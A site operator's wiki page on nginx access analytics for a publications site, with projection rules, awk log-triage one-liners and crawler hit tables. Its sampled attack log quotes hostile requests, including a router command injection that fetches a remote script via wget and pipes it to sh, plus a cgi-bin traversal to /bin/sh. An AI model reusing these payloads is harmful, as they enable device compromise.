Publications Access Graphs


metadata (Normative)

Title: Publications Access Graphs
Author: Ralph B. Holland
version: 1.11.0
Publication Date: 2026-01-30T01:55Z
Updates:
2026-03-12T22:51Z 1.11.0 - removed some graphs
2026-03-10T01:52Z 1.10.0 - graphs
2026-03-09T07:01Z 1.9.0 - fixed the semantic error in human-anon access graphlet, introduced human-ai, human-bot, human-machine lifecycle graphs
2026-03-08T20:43Z 1.8.3 - updated graphs and projections description
2026-03-06T21:40Z 1.8.1 - updated graphs
2026-03-04T22:21Z 1.8.0 - modified invariants to include Main Page and Category:Cognitive Memoisation in projections.
2026-03-03T20:19Z 1.7.1 - graphs
2026-03-02T10:25Z 1.7.0 - altered access.py to work with buckets and calc MA based on days
2026-02-27T10:21Z 1.6.0 - now use and included deterministic code to project graphs due to massive problems with models honouring invariants
2026-02-27T15:06Z 1.5.0 - Included Python code because the model ignores invariants.
2026-02-23T21:46Z 1.4.0 - modification to logrollup to modify <dir>-<metadata> carrier and also provide parallel metadata buckets.
2026-02-09T10:24Z 1.3.3 - included another access life cycle projection
2026-02-07T07:49Z 1.3.2 - refinements to GP-01 and included LG-0a.
2026-02-07T07:17Z 1.3.1 - elevated LG-0 to GP-0
2026-02-07T07:05Z 1.3.0 - included LG-0 to define up, down, left and right!
2026-02-06T00:00Z 1.2.0 - partial update of projections
2026-02-03T13:39Z 1.1.0 - separated out metadata access from Get. Various updates will appear within date-range sections because this document is live edited
2026-01-29T22:28Z 0.0.0 - concept.
Affiliation: Arising Technology Systems Pty Ltd
Contact: ralph.b.holland [at] gmail.com
Provenance: This is a curation artefact
Status: temporal ongoing updates expected

The metadata table immediately preceding is CM-defined and constitutes the authoritative provenance record for this artefact.

All fields in that table (including artefact, author, version, date and reason) MUST be treated as normative metadata.

The assisting system MUST NOT infer, normalise, reinterpret, duplicate, or rewrite these fields. If any field is missing, unclear, or later superseded, the change MUST be made explicitly by the human and recorded via version update, not inferred.

As curator and author, I apply the Apache License, Version 2.0, at publication to permit reuse and implementation while preventing enclosure or patent capture. This licensing action does not revise, reinterpret, or supersede any normative content herein.

Authority remains explicitly human; no implementation, system, or platform may assert epistemic authority by virtue of this license. (2025-12-18 version 1.0 - See the Main Page)

Publications access graphs

Scope

This is a collection of normatives and projections used to evaluate page interest and efficacy. The corpus is maintained as a corrigible set of publications, with lead-ins to and foundations of the work; these lead-ins are easily seen in the projections. A great number of hits come from AI bots and web-bots (only those I permit), and those accesses have overwhelmed the mediawiki page hit counters, so these projections filter out all that noise.

I felt that users of the corpus may find these projections an honest way of looking at live corpus page landings/updates (outside of Zenodo views and downloads). All public publications on the mediawiki may be viewed via category:public.

Sometimes the curator will supply a rollups.tgz covering all nginx virtual servers across the whole web-farm, and at other times a rollup that is already filtered to publications.arising.com.au. The model is NOT required to perform virtual server filtering.
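When the farm-wide rollups.tgz is supplied, the vhost filtering is done ahead of time by the curator. A minimal sketch of that pre-filter, assuming the custom log format in which the virtual host is the fourth quote-delimited value on each line (awk's $8 when splitting on `"`, as in the one-liners in the Tooling section); the index would need adjusting for any other format:

```python
# Hypothetical sketch: pre-filter a farm-wide access log down to one
# virtual server, so the model never performs vhost filtering itself.
# Assumes the vhost is awk's $8 when splitting on '"' (Python index 7).

def filter_vhost(lines, vhost="publications.arising.com.au"):
    kept = []
    for line in lines:
        fields = line.split('"')
        # awk $8 (1-based, separators kept) == Python index 7
        if len(fields) > 7 and fields[7].strip() == vhost:
            kept.append(line)
    return kept

sample = [
    'ip - - [t] "GET /wiki/X HTTP/1.1" 200 123 "-" "UA" "publications.arising.com.au"',
    'ip - - [t] "GET / HTTP/1.1" 200 9 "-" "UA" "other.example"',
]
print(len(filter_vhost(sample)))  # 1
```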

Projections

Rollup capture starts from 2025-12-23.

Projections include:

  • page access lifetime graphlets
  • page total accumulated hits by access category: human_get, metadata, ai, bot and bad-bot (new 2026-01-03)
  • accumulated human_get time series
  • page_category scatter plot

Appendix A provides one set of general invariants used for projections, followed by invariants for specific projections. In particular:

  • Corpus membership constraints apply ONLY to the accumulated human_get time series.
  • The daily hits scatter is NOT restricted to corpus titles.
  • Main_Page is excluded from the accumulated human_get projection, but not from the scatter plot - this is intentional
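The interaction of these three invariants can be sketched deterministically. This is illustrative only (not the normative Appendix A code); the row fields and the `corpus` set are hypothetical names:

```python
# Illustrative sketch of how the projection invariants interact when
# selecting rows. Field names and `corpus` are assumptions, not the
# normative Appendix A definitions.

def rows_for_accumulated(rows, corpus):
    # Corpus membership and the Main_Page exclusion apply here ONLY.
    return [r for r in rows
            if r["category"] == "human_get"
            and r["page"] in corpus
            and r["page"] != "Main_Page"]

def rows_for_scatter(rows):
    # No corpus restriction; Main_Page stays in.
    return rows

rows = [
    {"page": "Main_Page", "category": "human_get"},
    {"page": "Publications_Access_Graphs", "category": "human_get"},
    {"page": "Off_Corpus_Paper", "category": "human_get"},
]
corpus = {"Publications_Access_Graphs"}
print(len(rows_for_accumulated(rows, corpus)), len(rows_for_scatter(rows)))  # 1 3
```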

The projection data were acquired by logrollup of nginx access logs.

The logrollup program is in Appendix B - logrollup; it now contains a metadata bucket for anon/metadata access, which is by far the predominant corpus traffic (bots masquerading and presenting as web-browsers).
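A hedged sketch of the anon/metadata split that bucketing implies. The exact rules live in Appendix B; the path markers below are assumptions based on typical MediaWiki metadata endpoints, not the authoritative list:

```python
# Hedged sketch of anon/metadata vs human/anon/page bucketing.
# The marker list is an assumption (typical MediaWiki metadata
# endpoints), NOT the authoritative Appendix B rules.

METADATA_MARKERS = ("/api.php", "/load.php", "action=history", "action=info")

def bucket(path, agent_is_identified_bot):
    if agent_is_identified_bot:
        return "bot"
    if any(m in path for m in METADATA_MARKERS):
        # Bots masquerading as web-browsers mostly land here.
        return "anon/metadata"
    return "human/anon/page"

print(bucket("/pub-dir/load.php?modules=startup", False))  # anon/metadata
print(bucket("/pub/Publications_Access_Graphs", False))    # human/anon/page
```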

Appendix C - provides the Access Lifetime invariants.

Appendix D - page_list-verify produces aggregations for verification of the scatter plot and time series. In its own right, with the additional categories included, it is quite an insightful projection.

Access is assumed to be human-centric when the agent cannot be identified and the access is a real page access rather than a metadata access; identified robots and AI are relegated to non-human categories. The Bad Bot category covers any bot purposefully excluded from the web-server farm via nginx filtering. The human category also contains unidentified agents, because there is no definitive way to know that any access is really human. The rollups were verified against temporal nginx log analysis, and the characterisation between bot and human is fairly indicative. Metadata access is assumed to be from an agent, since humans normally do not crawl through metadata links.
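The human-by-default characterisation can be sketched as a fall-through classifier. The user-agent substring lists here are illustrative samples drawn from the summary table below, not the deterministic rules in the appendices:

```python
# Minimal sketch of the human-by-default characterisation. The substring
# lists are illustrative; unidentified agents deliberately fall through
# to "human" because humanity cannot be proven from a log line.

AI_AGENTS = ("GPTBot", "ChatGPT-User", "ClaudeBot", "PerplexityBot", "OAI-SearchBot")
BOT_AGENTS = ("Googlebot", "bingbot", "MJ12bot", "SemrushBot", "AhrefsBot")

def classify(user_agent, blocked_by_nginx=False):
    if blocked_by_nginx:
        return "bad-bot"   # purposefully excluded via nginx filtering
    if any(a in user_agent for a in AI_AGENTS):
        return "ai"
    if any(a in user_agent for a in BOT_AGENTS):
        return "bot"
    return "human"         # includes all unidentified agents

print(classify("Mozilla/5.0 ... ClaudeBot/1.0"))   # ai
print(classify("Mozilla/5.0 (Windows NT 10.0)"))   # human
```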

The accumulated page time series count starts from 2025-12-25 and has been filtered to pages from the Corpus, while the Scatter Plot is an aggregation across the entire period, categorised by agent, method and status code, and excludes only noise-type access - so that projection includes all publication papers that may be of interest (even those outside the corpus).
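Turning the daily counts into the accumulated series is a simple running total per page. A sketch, with hypothetical field names and pre-filtered input:

```python
# Sketch of the accumulated human_get time series: daily counts (already
# filtered to corpus human_get rows and sorted by date) turned into a
# running total per page. Field names are hypothetical.
from collections import defaultdict

def accumulate(daily_hits):
    totals, series = defaultdict(int), []
    for date, page, count in daily_hits:
        totals[page] += count
        series.append((date, page, totals[page]))
    return series

hits = [("2025-12-25", "PageA", 3), ("2025-12-26", "PageA", 2)]
print(accumulate(hits)[-1])  # ('2025-12-26', 'PageA', 5)
```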

I introduced the deterministic page_list_verify and the extra human_get bar graph for each page as a verification step. The model is evidently having projection difficulties, seemingly unable to follow the normative sections for projection. I have tried many ways to reconcile the output, so I can now normatively assert the upper bounds with the latest deterministic code.

Revised Projections

2026-06-12

2026-06-10

2026-06-09

metadata accessors

There are many automated systems scraping the web.

ralph@padme:~/AI$ ./sample nginx-logs.tgz

Tooling

I have weird agents attacking my farm. The following scripts are useful for seeing the top 50 agents.

  • to find attacks across the farm
awk -F\" '$6=="-" || $6=="" {print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50
  • loading PDF
awk -F\" '$2 ~ /\.pdf/ {print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50
  • check site wide
awk -F\" '$6=="-" || $6=="" {print $8 " | " $2}' access.log | sort | uniq -c | sort -nr | head -50

This is a sample of the type of attacks:

awk -F\" '$6=="-" || $6=="" {print $8 " | " $2}' access.log | sort | uniq -c | sort -nr | head -50

    178 xxx.com.au | GET / HTTP/1.1
    178 xxx.com.au | GET /wiki/Main_Page HTTP/1.1
    178 xxx.com.au | GET / HTTP/1.1
    153 xxx.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1
     10 xxx.com.au | GET / HTTP/1.1
      4 xxx.com.au | PROPFIND / HTTP/1.1
      4 xxx.com.au | GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1
      2 xxx.com.au | POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
      2 xxx.com.au | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
      2 xxx.com.au | GET /wp9.php HTTP/1.1
      2 xxx.com.au | GET /path.php HTTP/1.1
      2 xxx.com.au | GET /ms-edit.php HTTP/1.1
      1 xxx.com.au | GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1
      1 xxx.com.au | \x00\x0E8\xDA\xF2\x00\xD4q\x9E<U\x00\x00\x00\x00\x00
      1 xxx.com.au | \x00\x0E8\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00
      1 xxx.com.au | \x00\x07\x06\x1A\x1A\x03\x04\x03\x03\x00\x12\x00\x00\x00\x10\x00\x0E\x00\x0C\x02h2\x08http/1.1\x00\x1B\x00\x03\x02\x00\x02\x00\x17\x00\x00\xFE
      1 xxx.com.au | SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1
      1 xxx.com.au | MGLNDD_203.217.61.13_443
      1 xxx.com.au | 'GET / HTTP/1.1
      1 xxx.com.au | \x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1C=\x22\xE1\x1A\x98 \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=':\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0
      1 xxx.com.au | \x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03\xDE\x11Qk[KpN\x9E\xBD\x98I[\xF8\x7F\xA9\xFC{\xD8\xB6\xBE\x0C\x9A4ptu\xCC\xF2\x88!7 T\x7F\x9Aw\xFAeT\x1B#\xA3?\xCA\xFEoqGM\xC9V5\xA1\xF1\xAD\xB7\xF5\xDD\xB7\x22\xF7k
      1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xBE)\xDFj\xAD\xC5\x0B\xD0\xB9\x88L\xAB\xD0\x0F\x22\xBC\x0C5\x94\xDB\xCAZ\x8A\xF2}t/\xAB\x9D\xB1\x836 \xC4\xAA\xF4\x1B\xD5\xF7<\xFB\xDDO\xCA\xF3\xB6\x91\xC7R\xB6Fh\xCE]\xD1\x90`\xA7\x19\xD9\x00\xD9\x8F\xBA\xE5\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
      1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x80,\x1C\xF0\xEA\xE7\xF3W\xBD\x7F7\xDEp\xAC\xFCPHZ\x14\xCB^!\x06\x1A\xF9m/r1V\x86\x94 ;\x058\xC6\xF7\x84\xA5\xC5\x9C
      1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x12z\xDF\x86\xB1\xE9\xE7\x02?/e\xB4x-\x1ES\xF2A\xD6\x22\x94\xB7\x96\x7F-\xC8\xE2\xA3\xC0\xD9\x00\x86 <\xF8\xD9\xCCM%\xFA@\xEE\xD6\x8D~\xD8A^\x88\x0B\x06&a:\x16)\x08\xC43\x9A\xDE\xA7\x8Ct)\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
      1 xxx.com.au | \x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03[\xB4i\xAA/\x18}\x11\xD1\xE0\x94U\xB4\xE7\xC5:QI\x97\xC8\xE9/y)\x87\xC4\xDA\xAF>\x0F\xC1\xF0\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0'\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
      1 xxx.com.au | \x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03'7\xE9\xB27p\x06\x96\xEA\xC6\xE3\xCC
      1 xxx.com.au | \x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
      1 xxx.com.au | \x00\x0E8\x95z\xAA\x1C\xB2+\xF4Z\x00\x00\x00\x00\x00
      1 xxx.com.au | t3 12.1.2
  • general top access
root@padme:/var/log/nginx#  awk -F\" '{print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50
    956 f.com.au | HEAD / HTTP/1.1 | curl/7.88.1
    956 c.com.au | HEAD / HTTP/1.1 | curl/7.88.1
    956 w.com.au | HEAD / HTTP/1.1 | curl/7.88.1
    190 y.com.au | HEAD / HTTP/1.1 | curl/7.81.0
    178 w.com.au | GET / HTTP/1.1 | -
    178 ww.com.au | GET /wiki/Main_Page HTTP/1.1 | -
    178 ww.com.au | GET / HTTP/1.1 | -
    153 f.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1 | -
     56 p.com.au | POST /pub-dir/api.php HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
     56 c.com.au | POST /update/picture.cgi HTTP/2.0 | Mozilla/5.0 zgrab/0.x
     50 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
     48 r.org | GET /rt/Training_Outreach HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
     48 r.org | GET / HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
     46 r.org | GET /favicon.ico HTTP/2.0 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
     40 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
     34 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
     32 f.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
     28 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
     26 p.com.au | GET /pub-dir/images/0/03/Part_91_Plain_English_Guide.pdf HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
     23 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     22 w.com.au | GET /favicon.ico HTTP/2.0 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
     22 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
     22 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     21 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     19 padme.arising.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0
     19 padme.arising.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     18 p.com.au | GET /pub-dir/load.php?lang=en-gb&modules=site.styles&only=styles&skin=vector-2022 HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
     18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
     18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     16 p.com.au | GET /pub-dir/load.php?lang=en-gb&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
     16 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:119.0) Gecko/20100101 Firefox/119.0
     16 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
     15 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
     15 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     14 w.com.au | GET /robots.txt HTTP/1.1 | Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)
     14 p.com.au | GET /robots.txt HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
     14 p.com.au | GET /pub/Publications_Access_Graphs HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
     14 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

Summary (Sampled Log Windows with Infrastructure Event)

Class 2025-12-27 2025-12-28 2025-12-30 2026-01-03 2026-01-10 2026-01-22 2026-01-30 2026-02-04 2026-02-11 2026-02-20 2026-02-28 2026-03-03 2026-03-04 2026-03-05 2026-03-06 2026-03-07 2026-03-08 2026-03-09 2026-03-10 2026-03-11 2026-03-12 2026-03-13
Bytes 797060581 1775268742 964590593 1535680600 1196666216 1946354694 1972512052 3889575239 1435222777 1304762776 1113973398 605571945 1133432762 608526905 410444255 603790891 674927635 822446879 1147557674 3230976394 4724439305 391811411
Total Hits 17104 24709 23655 25051 22652 26792 20092 22713 35298 21912 31625 15803 27101 21095 21969 18606 20393 22113 23295 53543 36938 6254
Rate MiB/h 31.7 70.5 38.3 61.0 47.6 77.3 78.4 154.6 57.0 51.8 44.3 24.1 45.0 24.2 16.3 24.0 26.8 32.7 45.6 128.4 187.7 15.6
Average kiB/hit 45.5 70.2 39.8 59.9 51.6 70.9 95.9 167.2 39.7 58.1 34.4 37.4 40.8 28.2 18.2 31.7 32.3 36.3 48.1 58.9 124.9 61.2
Local Access 0 2232 1685 1626 2259 1117 2157 1695 36 1670 8436 2997 6659 1839 1304 1930 3870 5421 6545 1014 820 0
Human/Anon/Page 9510 11039 9973 11277 9776 11862 9201 6300 9398 6452 7254 3769 6076 5395 5676 6264 6192 5455 6047 5866 5942 1372
Anon/Metadata 1180 2690 646 3144 1010 1085 2232 1903 3562 4465 3439 2420 4603 3857 4878 3881 4041 3833 4742 5445 4018 1489
Other 4531 3929 4688 6081 4678 7408 3187 2688 5746 6848 9791 5246 7856 8050 8619 4440 4934 5342 4277 9208 4439 1912
Bad Bot 1391 1198 6275 2055 3144 709 1032 1384 696 748 573 285 522 560 503 462 504 482 487 327 301 32
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot) 93 3171 3 8 149 6 109 7745 14490 770 163 608 26 65 0 853 54 827 0 39 16368 1199
meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) 2 4 3 7 2 1 2 3 30 11 5 0 34 79 10 9 11 6 2 29895 3917 1
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) 0 4 1 0 1110 738 1597 295 19 224 1180 0 752 555 514 282 315 70 659 801 333 82
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot) 0 0 0 0 0 3306 0 1 2 2 4 5 0 0 0 2 0 1 2 82 8 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36 3 17 19 15 5 152 151 151 168 93 161 77 91 69 64 105 101 96 106 104 139 21
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot 44 34 52 55 82 66 70 75 103 53 68 140 128 77 84 73 45 89 111 231 141 31
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot 124 161 123 259 111 76 80 116 330 48 49 30 32 51 20 32 8 28 24 22 59 4
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 0 0 0 0 6 4 4 4 227 182 179 7 9 197 10 4 3 64 8 11 105 1
Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com) 13 17 16 12 16 24 22 25 70 19 25 30 36 34 36 30 40 34 28 42 35 10
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 20 33 27 47 25 39 19 27 23 26 25 24 32 29 25 31 33 28 31 34 17 19
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 0 0 0 0 0 0 0 0 39 52 72 31 62 68 52 52 105 58 8 0 0 0
Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html) 2 0 0 6 1 0 18 3 21 32 21 18 56 35 52 17 32 187 11 40 20 3
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 34 56 35 294 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot) 14 0 1 5 18 12 5 0 38 89 43 3 5 8 11 12 7 10 3 84 17 2
Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/) 31 46 37 23 21 21 30 21 56 40 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 0 0 0 0 119 52 94 27 5 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 0 0 0 0 0 0 0 0 0 0 3 0 2 3 4 7 2 0 66 79 69 32
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot 12 12 11 11 12 14 14 14 14 12 12 11 5 14 14 11 15 9 15 15 17 2
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot 4 1 2 7 5 2 4 77 106 0 0 31 9 14 0 0 0 0 0 0 0 0
Googlebot-Image/1.0 9 10 4 69 14 10 15 8 12 4 8 4 10 13 4 10 5 1 6 10 10 0
